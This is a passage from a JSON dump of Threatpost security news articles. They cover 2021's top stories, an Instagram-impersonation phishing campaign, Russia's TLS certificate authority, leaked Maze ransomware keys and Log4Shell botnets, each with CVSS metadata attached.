ecosystem, leaving massive supply-chain risk on the table from [Log4Shell exploits](<https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/>). It will likely take \u201cyears\u201d for it to be fixed across the ecosystem, [according](<https://threatpost.com/java-supply-chain-log4j-bug/177211/>) to Google\u2019s security team.\n\nUsing malicious packages as a cyberattack vector was a common theme earlier in the year too. Here\u2019s a rundown of other recent discoveries:\n\n * In January, other Discord-stealing malware [was discovered](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>) in three npm packages. One, \u201can0n-chat-lib\u201d had no legitimate \u201ctwin\u201d package, but the other two made use of brandjacking and typosquatting to lure developers into thinking they\u2019re legitimate. The \u201cdiscord-fix\u201d malicious component is named to be similar to the legitimate \u201cdiscord-XP,\u201d an XP framework for Discord bots. The \u201csonatype\u201d package meanwhile made use of pure brandjacking.\n * In March, researchers [spotted](<https://threatpost.com/malicious-code-bombs-amazon-lyft-slack-zillow/164455/>) malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository \u2013 all of which exfiltrated sensitive information.\n * That March attack was based on research from security researcher Alex Birsan, who found that it\u2019s possible to [inject malicious code](<https://threatpost.com/supply-chain-hack-paypal-microsoft-apple/163814/>) into common tools for installing dependencies in developer projects. Such projects typically use public repositories from sites like GitHub. The malicious code then can use these dependencies to propagate malware through a targeted company\u2019s internal applications and systems. The novel supply-chain attack was (ethically) used to breached the systems of more than 35 technology players, including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla and Uber, by exploiting public, open-source developer tools.\n * In June, a group of cryptominers was found [to have infiltrated](<https://threatpost.com/cryptominers-python-supply-chain/167135/>) the PyPI. Researchers found six different malicious packages hiding there, which had a collective 5,000 downloads.\n * In July, a credentials-stealing package that uses legitimate password-recovery tools in Google\u2019s Chrome web browser [was found lurking in ](<https://threatpost.com/npm-package-steals-chrome-passwords/168004/>)npm. Researchers caught the malware filching credentials from Chrome on Windows systems. The password-stealer is multifunctional: It also listens for incoming commands from the attacker\u2019s command-and-control (C2) server and can upload files, record from a victim\u2019s screen and camera, and execute shell commands.\n\n## **4\\. Interesting Ransomware Variants**\n\nThe ransomware epidemic matured in 2021, with the actual malware used to lock up files progressing beyond simply slapping an extension on targeted folders. Readers flocked to malware analysis stories covering advancements in ransomware strains, including the following Top 3 discoveries.\n\n### **HelloKitty\u2019s Linux Variant Targets VMs**\n\nIn June, for the first time, researchers [publicly spotted](<https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/>) a Linux encryptor \u2013 being used by the HelloKitty ransomware gang.\n\nHelloKitty, the same group behind the [February attack](<https://threatpost.com/cyberpunk-2077-publisher-hack-ransomware/163775/>) on videogame developer CD Projekt Red, has developed numerous Linux ELF-64 versions of its ransomware, which it used to target VMware ESXi servers and virtual machines (VMs) running on them.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/16162559/hellokitty-e1626467172148.jpeg>)\n\nVMware ESXi, formerly known as ESX, is a bare-metal hypervisor that installs easily onto servers and partitions them into multiple VMs. While that makes it easy for multiple VMs to share the same hard-drive storage, it sets systems up to be one-stop shopping spots for attacks, since attackers can encrypt the centralized virtual hard drives used to store data from across VMs.\n\nDirk Schrader of New Net Technologies (NNT) told Threatpost that on top of the attraction of ESXi servers as a target, \u201cgoing that extra mile to add Linux as the origin of many virtualization platforms to [malware\u2019s] functionality\u201d has the welcome side effect of enabling attacks on any Linux machine.\n\n### **MosesStaff: No Decryption Available**\n\nA politically motivated group known as MosesStaff [was seen in November](<https://threatpost.com/mosesstaff-locks-targets-ransom-decryption/176366/>) paralyzing Israeli entities with no financial goal \u2013 and no intention of handing over decryption keys. Instead, it was using ransomware in politically motivated, destructive attacks at Israeli targets, looking to inflict the most damage possible.\n\nMosesStaff encrypts networks and steals information, with no intention of demanding a ransom or rectifying the damage. The group also maintains an active social-media presence, pushing provocative messages and videos across its channels, and making its intentions known.\n\n### **Epsilon Red Targets Exchange Servers**\n\nThreat actors in June [were seen deploying](<https://threatpost.com/exchange-servers-epsilon-red-ransomware/166640/>) new ransomware on the back of a set of PowerShell scripts developed for exploiting flaws in unpatched Exchange Servers.\n\nThe Epsilon Red ransomware \u2013 a reference to an obscure enemy character in the X-Men Marvel comics, a super soldier of Russian origin armed with four mechanical tentacles \u2013 was discovered after an attack on a U.S.-based company in the hospitality sector.\n\nResearchers said the ransomware was different in the way it spreads its hooks into a corporate network. While the malware itself is a \u201cbare-bones\u201d 64-bit Windows executable programmed in the Go programming language, its delivery system relies on a series of PowerShell scripts that \u201cprepared the attacked machines for the final ransomware payload and ultimately delivered and initiated it,\u201d they wrote.\n\n## **5\\. Gaming Security**\n\nFor the second year in a row, gaming security was on the radar for readers in 2021, possibly because cybercriminals continue to target this area as result of the global COVID-19 pandemic driving higher volumes of play. In a recent survey by Kaspersky, nearly 61 percent reported suffering foul play such as ID theft, scams or the hack of in-game valuables. Some of the most popular articles are recapped below.\n\n### **Steam Used to Host Malware**\n\nIn June, the appropriately named SteamHide malware [emerged](<https://threatpost.com/steam-gaming-delivering-malware/166784/>), which disguises itself inside profile images on the gaming platform Steam.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/01084854/Steam-logo.jpg>)\n\nThe Steam platform merely serves as a vehicle which hosts the malicious file, according to research from G Data: \u201cThe heavy lifting in the shape of downloading, unpacking and executing a malicious payload fetched by the loader is handled by an external component, which accesses the malicious profile image on one Steam profile. This external payload can be distributed via crafted emails to compromised websites.\u201d\n\nThe steganography technique is obviously not new \u2014 but Steam profiles being used as attacker-controlled hosting sites, is \u2013 and readers\u2019 ears perked up in a big way when we posted the story.\n\n### **Twitch Source-Code Leak**\n\nIn October, an anonymous user posted a link to a 125GB torrent on 4chan, containing all of Twitch\u2019s source code, comments going back to its inception, user-payout information and more.\n\nThe attacker [claimed to have ransacked](<https://threatpost.com/twitch-source-code-leaked/175359/>) the live gameplay-streaming platform for everything it\u2019s got; Twitch confirmed the breach not long after.\n\nThe threat actor rationalized gutting the service by saying that the Twitch community needs to have the wind knocked out of its lungs. They called the leak a means to \u201cfoster more disruption and competition in the online-video streaming space,\u201d because \u201ctheir community is a disgusting toxic cesspool.\u201d\n\n### **Steam-Stealing Discord Scams**\n\nIn November, a scam started making the rounds on Discord, through which cybercriminals could harvest Steam account information and make off with any value the account contained.\n\nGamer-aimed Discord scams are just about everywhere. But researchers [flagged a new approach](<https://threatpost.com/free-discord-nitro-offer-steam-credentials/176011/>) as noteworthy because it crossed over between Discord and the Stream gaming platform, with crooks offering a purported free subscription to Nitro (a Discord add-on that enables avatars, custom emoji, profile badges, bigger uploads, server boosts and so on), in exchange for \u201clinking\u201d the two accounts.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/04113440/nitro-fake-discord-website-600x324-1.png>)\n\nThe target is first served a malicious direct message on Discord with the fake offer. \u201cJust link your Steam account and enjoy,\u201d the message said, which included a link to purportedly do just that. The malicious link takes users to a spoofed Discord page with a button that reads, \u201cGet Nitro.\u201d Once a victim clicks on the button, the site appears to serve a Steam pop-up ad, but researchers explained the ad is still part of the same malicious site.\n\nThe gambit is intended to fool users into thinking they\u2019re being taken to the Steam platform to enter in their login information \u2014 in reality, the crooks are poised to harvest the credentials.\n\n### **Sony PlayStation3 Bans**\n\nIn June, a reported breach of a Sony folder containing the serial ID numbers for every PlayStation3 console out there [appeared to](<https://threatpost.com/ps3-players-ban-attacks-gaming/167303/>) have led to users being inexplicably banned from the platform.\n\nSony reportedly left a folder with every PS3 console ID online unsecured, and it was discovered and reported by a Spanish YouTuber with the handle \u201cThe WizWiki\u201d in mid-April. In June, players on PlayStation Network message boards began complaining that they couldn\u2019t sign on.\n\nUsers mused that threat actors started using the stolen PS3 console IDs for malicious purposes, causing the legitimate players to get banned. But Sony didn\u2019t confirm a connection between the PS3 ID breach and player reports of being locked out of the platform.\n\n## **Bonus Item: Zodiac Killer Cipher \u2013 Revealed!!**\n\nOne of the quirky stories that made it into the Top 10 most-read Threatpost stories for 2021 concerned the cracking of the Zodiac\u2019s serial killer\u2019s 340 cipher, which couldn\u2019t be solved for 50 years. \nIn December 2020, the code [was cracked](<https://threatpost.com/cryptologists-zodiac-killer-340-cipher/162353/>) by a team of mathematicians.\n\nThe Zodiac serial killer is believed to have murdered at least five people \u2014 and likely more \u2014 in and around the Northern California area in the late 1960s and early 1970s. The still-unnamed murderer sent a series of four coded messages to local newspaper outlets, bragging about his crimes and containing cryptic icons, which earned him the moniker \u201cZodiac.\u201d[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/12/17122725/Zodiac-e1608226062664.jpg>)\n\nThe first cipher was quickly decoded. But the second, the 340 Cipher, named after its 340 characters, was trickier to figure out. Australian-based mathematician Sam Blake calculated that there were 650,000 possible ways to read the code, and Jarl Van Eycke, whose day job is as a warehouse operator in Belgium, wrote a code-breaking software to tackle decryption. Soon, their unique algorithmic approach paid off. The message, officially recognized by the FBI as correct, reads:\n\n\u201cI HOPE YOU ARE HAVING LOTS OF FUN IN TRYING TO CATCH ME THAT WASNT ME ON THE TV SHOW WHICH BRINGS UP A POINT ABOUT ME I AM NOT AFRAID OF THE GAS CHAMBER BECAUSE IT WILL SEND ME TO PARADICE ALL THE SOONER BECAUSE I NOW HAVE ENOUGH SLAVES TO WORK FOR ME WHERE EVERYONE ELSE HAS NOTHING WHEN THEY REACH PARADICE SO THEY ARE AFRAID OF DEATH I AM NOT AFRAID BECAUSE I KNOW THAT MY NEW LIFE IS LIFE WILL BE AN EASY ONE IN PARADICE DEATH.\u201d\n\nWhile the name of the elusive serial killer remains hidden, the breakthrough represents a triumph for cryptology and the basic building blocks of cybersecurity \u2014 access control and segmentation.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T18:57:24", "type": "threatpost", "title": "The 5 Most-Wanted Threatpost Stories of 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T18:57:24", "id": "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "href": "https://threatpost.com/5-top-threatpost-stories-2021/177278/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T14:21:33", "description": "A phishing campaign used the guise of Instagram technical support to steal login credentials from employees of a prominent U.S. life insurance company headquartered in New York, researchers have revealed.\n\nAccording to a [report](<https://www.armorblox.com/blog/the-email-bait-and-phish-instagram-phishing-attack>) published by Armorblox on Wednesday, the attack combined brand impersonation with social engineering and managed to bypass Google\u2019s email security by using a valid domain name, eventually reaching the mailboxes of hundreds of employees.\n\n## Scam Looked Identical to Instagram\n\nThe attack began with a simple email. Disguised as an alert from Instagram\u2019s technical support team, it indicated that the recipient\u2019s account was under threat of deactivation. The intention, according to the report, was \u201cto create a sense of urgency while instilling trust in the sender.\u201d\n\n\u201cYou have been reported for sharing fake content in your membership,\u201d read the body of the email. \u201cYou must verify your membership. If you can\u2019t verify within 24 hours your membership will be permanently deleted from our servers.\u201d This message fostered a sense of urgency, to goad the unsuspecting into clicking on a malicious \u201caccount verify\u201d link. Targets who did so ended up on a landing page, where they were asked to submit their Instagram account login information. That information would go straight to the malicious actor, of course, unbeknownst to the target themselves.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16092345/instagram-phishing-email-e1647437038569.png>)\n\nInstagram phishing email. Source: Armorblox.\n\nAt no point did any of these steps \u201clook to be malicious to the common end user, and every touch point, from the email to the account verification form, include Meta and Instagram branding and logos,\u201d the researchers noted.\n\nThe attackers certainly left clues along the way. They made grammar, spelling and capitalization errors in the body of the phishing email. In the sender field, the \u201cI\u201d in \u201cInstagram Support\u201d was, in fact, an \u201cL.\u201d And the email domain itself \u2013 membershipform@outlook.com.tr \u2013 clearly didn\u2019t come from Instagram.\n\nStill, the domain itself was perfectly legitimate \u2013 allowing it to bypass traditional spam filters \u2013 and, the researchers explained, \u201cthe sender crafted a long email address, meaning that many mobile users would only see the characters before the \u2018@\u2019 sign, which in this case is \u2018membershipform\u2019 \u2013 one that would not raise suspicion.\u201d\n\n## How to Defend Yourself\n\nJust a few weeks ago, cyberattackers [impersonated](<https://threatpost.com/cyberattackers-docusign-steal-microsoft-outlook-logins/178613/>) the DocuSign e-signature software to steal Microsoft account credentials from a U.S. payment solutions company. In that case, too, hundreds of employees were exposed as a result of dutiful brand impersonation, clever social engineering and a valid email domain that bypassed traditional security measures.\n\nPerhaps these two campaigns were identified and stopped, but what about the next one? Or the one after that? Or other campaigns we haven\u2019t heard about, because they weren\u2019t successfully identified by a security team?\n\nArmorblox\u2019s report suggested four main areas where employees can focus to protect themselves against phishing.****\n\n * **Avoid opening emails that you are not expecting**\n * **Augment native email security to stop socially engineered attacks**\n * **Watch out for targeted attacks**\n * **Follow multi-factor authentication and password management best practices**\n\n\u201cTo protect against these attacks, employees should be educated on the value of their email accounts,\u201d wrote Erich Kron of KnowBe4, via email. \u201cIn addition, employees need to understand the danger of reusing passwords and using simple passwords to secure accounts both personally and within the organization.\u201d\n\nEven one employee\u2019s slip-up can cause major problems across an organization, followed by other organizations along a supply chain. \u201cTake caution when using business credentials to login across multiple apps,\u201d wrote Armorblox researchers, \u201cespecially social apps that cross over into personal use. The convenience may be tempting; however, it only takes one time for both your sensitive personal and business data to risk exposure.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T04:00:47", "type": "threatpost", "title": "Phony Instagram \u2018Support Staff\u2019 Emails Hit Insurance Company", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-16T04:00:47", "id": "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "href": "https://threatpost.com/phony-instagram-support-staff-emails-hit-insurance-company/178929/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T18:35:15", "description": "Russia is offering its own trusted Transport Layer Security (TLS) certificate authority (CA) to replace certificates that need to be renewed by foreign countries. As it is, a pile of sanctions imposed in the wake of Russia\u2019s invasion of Ukraine is gumming up its citizen\u2019s access to websites.\n\nAs it is, Russian sites are stuck, unable to renew their certs because sanctions keep signing authorities in many countries unable to accept payments from Russia, according to[ BleepingComputer](<https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/>).\n\nTLS \u2013 more commonly known as SSL, or TLS/SSL \u2013 is a cryptographic protocol that secures the internet by encrypting data sent between your browser, the websites you visit and the website\u2019s server. The certificates keep data transmission private and prevent modification, loss or theft, as digicert [explains](<https://www.digicert.com/tls-ssl/tls-ssl-certificates>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/11125728/how_TLS_certificates_work-e1647021505756.jpg>)\n\nHow TLS certificates work. Source: Digicert.\n\nAccording to a[ notice](<https://www.gosuslugi.ru/tls>) on Russia\u2019s public service portal, Gosuslugi, as shown in a translated version in this article\u2019s featured art, the certificates will replace foreign security certs if they expire or get yanked by foreign CAs. According to the portal, the service is available to all legal entities operating in Russia, with the certificates delivered to site owners upon request within five working days.\n\n## The \u2018Digital Iron Curtain\u2019\n\nOver the past two weeks, Russia\u2019s internet services have been cut off by multiple major U.S. internet suppliers, including [Cogent Communications](<https://www.siliconrepublic.com/comms/russia-internet-backbone-cogent-ukraine>), reportedly the second-largest internet carrier servicing Russia. Lumen, another major U.S. internet supplier, [followed suit](<https://www.washingtonpost.com/technology/2022/03/08/lumen-internet-russia-backbone-cut/>) on Tuesday, pushing the country\u2019s citizens behind what some analysts are calling \u201ca new digital Iron Curtain.\u201d\n\nMikhail Klimarev, executive director of the [Internet Protection Society](<https://2020.internethealthreport.org/>), which advocates for digital freedoms in Russia, told [The Washington Post](<https://www.washingtonpost.com/technology/2022/03/04/russia-ukraine-internet-cogent-cutoff/>) that he\u2019s \u201cvery afraid of this.\u201d\n\n\u201cI would like to convey to people all over the world that if you turn off the Internet in Russia, then this means cutting off 140 million people from at least some truthful information. As long as the Internet exists, people can find out the truth. There will be no Internet \u2014 all people in Russia will only listen to propaganda.\u201d\n\n## Chrome, Firefox, Edge Won\u2019t Swallow the New Certs\n\nBleepingComputer reported on Thursday that the only web browsers that were recognizing the new CA as trustworthy at the time were the Russia-based Yandex browser and Atom products: Russian users\u2019 only alternative to browsers such as Chrome, Firefox, Edge and others.\n\nSomebody with a Mozilla domain email on Thursday started a [thread](<https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/QaKxfr5hOXg>) to discuss examination of the new root Russia cert, pointing to the possibility of the Russian government using it to start mand-in-the-middle (MitM) [attacks](<https://bugzilla.mozilla.org/show_bug.cgi?id=1758773>) \u2013 though, they said, none had been detected as of yesterday.\n\n\u201cAlthough at present there\u2019s no MitM, it\u2019s likely that government websites will start using this and once adoption is high enough Russia will perhaps start MitM,\u201d they said. They cited an ISP who said that it had been told that the new cert was mandatory, making the certificate \u201cworth urgent consideration.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-11T18:34:34", "type": "threatpost", "title": "Russia Issues Its Own TLS Certs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-11T18:34:34", "id": "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "href": "https://threatpost.com/russia-issues-its-own-tls-certs/178891/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-11T16:14:34", "description": "The shackles have been broken for victims of Maze/Egregor/Sekhmet ransomware: On Wednesday, decryption keys were released for all three ransomware strains in a [forum post](<https://www.bleepingcomputer.com/forums/t/768330/leak-maze-egregor-sekhmet-keys-along-with-m0yv-expiro-source-code/>).\n\nThe liberator, using the handle \u201cTopleak,\u201d described themselves as the developer of the three ransomwares.\n\nIt\u2019s been lovely, but now it\u2019s time to say bye-bye, Topleak said: \u201cNeither of our team member will never return to this kind of activity, it was pleasant to work with you. All source code of tools ever made is wiped out.\u201d\n\nTranslation: Maze team members are purportedly never going back to ransomware, and they\u2019ve destroyed all of their ransomware source code. In the post, Topleak included a .ZIP file containing decryption keys for the ransomware, along with some of the Maze gang\u2019s malware source code. The .ZIP file was subsequently removed from the post, due to the fact that it included that source code.\n\nThe original keys aren\u2019t necessary, though: After confirming that those decryption keys are legitimate, Emsisoft [released a decryptor](<https://www.emsisoft.com/ransomware-decryption-tools/maze-sekhmet-egregor>) that will enable any Maze, Egregor and Sekhmet victims to recover their files for free.\n\n## Innovators of the Double Whammy\n\nMaze, once considered one of the most active ransomware gangs out there, was a pioneer in the dark art of [double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>): i.e., not only snarling a target\u2019s files in a ransomware attack, but also threatening to make the encrypted data publicly available if the victim doesn\u2019t pay up.\n\nThe gang first bubbled up in November 2019, going on to score big hits against the likes of [Cognizant](<https://threatpost.com/maze-ransomware-cognizant/154957/>) and [Xerox](<https://www.crn.com/news/security/xerox-files-allegedly-stolen-by-maze-ransomware-group-reports>).\n\nThen, in summer 2020, Maze formed a cybercrime cartel, joining forces with various ransomware strains, including [Egregor](<https://threatpost.com/egregor-ransomware-mass-media-corporate-data/159816/>), to [share code, ideas and resources](<https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/>).\n\nSome experts considered Egregor to be a [reincarnation](<https://www.zdnet.com/article/egregor-ransomware-operators-arrested-in-ukraine/>) of Maze. For its part, Appgate [judged](<https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor>) Egregor\u2019s code to be a spinoff of the[ Sekhmet ransomware](<https://www.itwire.com/security/criminals-use-sekhmet-ransomware-to-hit-gas-company-silpac-twice.html>) \u2013 a link that was[ also noted](<https://twitter.com/demonslay335/status/1307056098596335628>) by other researchers.\n\nMaze [announced](<https://grahamcluley.com/maze-ransomware-gang-closes/>) it was [shutting down](<https://www.computerweekly.com/news/252491480/Maze-ransomware-shuts-down-with-bizarre-announcement>) in November 2020, posting a self-righteous screed in which it explained that the \u201cproject\u201d had been set up because the world is \u201csinking into recklessness and indifference, in laziness and stupidity.\u201d\n\nIts year-long cybercrime spree was all about demonstrating their targeted organizations\u2019 lax cybersecurity hygiene, according to its press release \u2013 as if a ransomware attack is the cyber-equivalent of, say, a colon cleanse.\n\n## Maze: We\u2019re For Reals\n\nIt\u2019s not uncommon for cyber-gangs to announce their retirement and then yo-yo back into business, turning up for other cybercrime projects.\n\nOne example is GandCrab, the ransomware-as-a-service (RaaS) outfit that announced in June 2019 that it was going to [kick back](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>) and enjoy the $2 billion it had made in a year-long feeding frenzy\u2026only to jump out of its rocking chair a few months later, with code analysis [linking](<https://threatpost.com/gandcrab-operators-resurface-revile-malware/148631/>) the authors to REvil/Sodinokibi ransomware.\n\nAnother example is [BlackMatter](<https://threatpost.com/blackmatter-ransomware-dark/175955/>), considered a [rebirth](<https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/>) of at least some of the lower-level REvil and BackMatter players, which announced it would shut down \u2013 again \u2013 in November following pressure from local authorities. DarkSide\u2019s shutdown, coming a few weeks after the RaaS gang [crippled Colonial Pipeline Co.](<https://threatpost.com/pipeline-crippled-ransomware/165963/>), also happened after [it got raided by authorities.](<https://threatpost.com/darksides-servers-shutdown/166187/>).\n\nThe Maze gang could follow the same path, turning their supposed retirement into an opportunity to move on to new projects. Topleak addressed the haziness and chatter that typically surround \u201cgoing out of business\u201d announcements, writing in their announcement that the gang isn\u2019t being forced out of the ransomware business:\n\n\u201cSince it will raise too much clues and most of them will be false, it is necessary to emphasize that it is planned leak, and have no any connections to recent arrests and takedowns,\u201d Topleak said.\n\n_**Join Threatpost on **Wed. Feb 23 at 2 PM ET** for a **[LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)** \u201cThe Secret to Keeping Secrets\u201d focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. **[REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)** and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-10T23:16:44", "type": "threatpost", "title": "Decryptor Keys Published for Maze, Egregor, Sekhmet Ransomwares", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-10T23:16:44", "id": "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "href": "https://threatpost.com/decryptor-keys-maze-egregor-sekhmet-ransomwares/178363/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:15", "description": "Cybersecurity professionals across the world have been scrambling to shore up their systems against a critical [remote code-execution (RCE) flaw ](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) (CVE-2021-44228) in the Apache Log4j tool, discovered just days ago.\n\nNow under active exploit, the \u201cLog4Shell\u201d bug allows complete server takeover. Researchers have started to fill in the details on the latest Log4Shell attacks, and they reported finding at least 10 specific Linux botnets leading the charge.\n\nFirst, analysts at NetLab 360 detected two waves of [Log4Shell attacks](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) on their honeypots, from the Muhstik and Mirai botnets.\n\n## **Mirai Tweaked to Troll for Log4Shell Vulnerability **\n\nThe analysts at Netlab 360 said this is a new variant of Mirai with a few specific innovations. First, they pointed out the code piece \u201ctable_init/table_lock_val/table_unlock_val and other Mirai-specific configuration management functions have been removed.\u201d\n\nSecondly, they added, \u201cThe attack_init function is also discarded, and the DDoS attack function is called directly by the command-processing function.\u201d\n\nFinally, they found this iteration of the Mirai botnet uses a two-level domain for its command-and-control (C2) mechanis,, which the team at Netlab 360 said was \u201crare.\u201d\n\n## **Muhstik Variant Attacks Log4Shell **\n\nThe other Linux botnet launched to take advantage of the Apache 4j Library flaw is [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>), a Mirai variant.\n\n\u201cIn this captured sample, we note that the new Muhstik variant adds a backdoor module, ldm, which has the ability to add an SSH backdoor public key with the following installed backdoor public key,\u201d Netlab 360 reported.\n\nOnce added, the public key lets a threat actor log onto the server without so much as a password, they explained.\n\n\u201cMuhstik takes a blunt approach to spread the payload aimlessly, knowing that there will be vulnerable machines, and in order to know who has been infected, Muhstik adopts TOR network for its reporting mechanism,\u201d the Netlab 360 team said.\n\nFollowing detection of those attacks, the Netlab 360 team [found](<https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/>) other botnets on the hunt for the Log4Shell vulnerability including: DDoS family Elknot; mining family m8220; SitesLoader; xmrig.pe; xmring.ELF; attack tool 1; attack tool 2; plus one unknown and a PE family.\n\n## **Geography of Log4Shell Attacks 